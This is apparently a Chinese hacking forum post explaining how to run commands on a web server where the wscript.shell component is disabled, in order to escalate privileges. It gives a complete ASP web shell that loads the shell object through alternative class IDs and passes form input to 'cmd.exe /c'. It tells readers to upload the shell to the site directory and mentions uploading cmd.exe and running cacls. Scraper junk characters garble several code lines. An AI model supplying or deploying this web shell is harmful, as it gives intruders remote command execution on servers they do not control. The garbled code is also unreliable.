wscript.shell删除解决办法

admin

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法，成功率为五五之数。
- T: [, b1 J, X/ s8 f: s把下面代码复制：
5 N6 M* v. ]" ]) E4 v6 |<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
# H0 K% L+ Z  x. R/ c<%if err then%>
6 \/ S8 g; R4 U1 J9 H  a9 d<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
/ G, ?1 N5 q- r+ k5 p( v* j( Vend if
5 e% a4 W" P7 v2 N9 |: m4 P: X- J' cresponse.write("<textarea readonly cols=80 rows=20>")
' I+ m: @( k+ `! I) f, ?- {On Error Resume Next
+ m4 U* e4 V' _* x, |( Q0 _3 }# lresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
' a5 R% V" e# E- d6 w2 ?2 j9 ]response.write("</textarea>")
response.write("<form method='post'>")
- b, G8 o- D9 l+ Q9 q! n) v' s) Fresponse.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='执行'></form>")
8 _. O8 V; T0 F, F7 q6 r%>
$ g6 V1 f/ w- n) J% q. |
( \) w, S: o7 n! G保存为一个asp文件，然后传到网站目录上去
) l  O, P1 E6 V8 z/ ?& x( m运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
5 i, @! j& l# @' r1 q5 K' \) o我用此成功运行过cacls命令。
' X+ w  b3 E) f
& f7 _8 ]  v, d9 s8 m  G- C第二那就是运行时出错，可能限制某些代码执行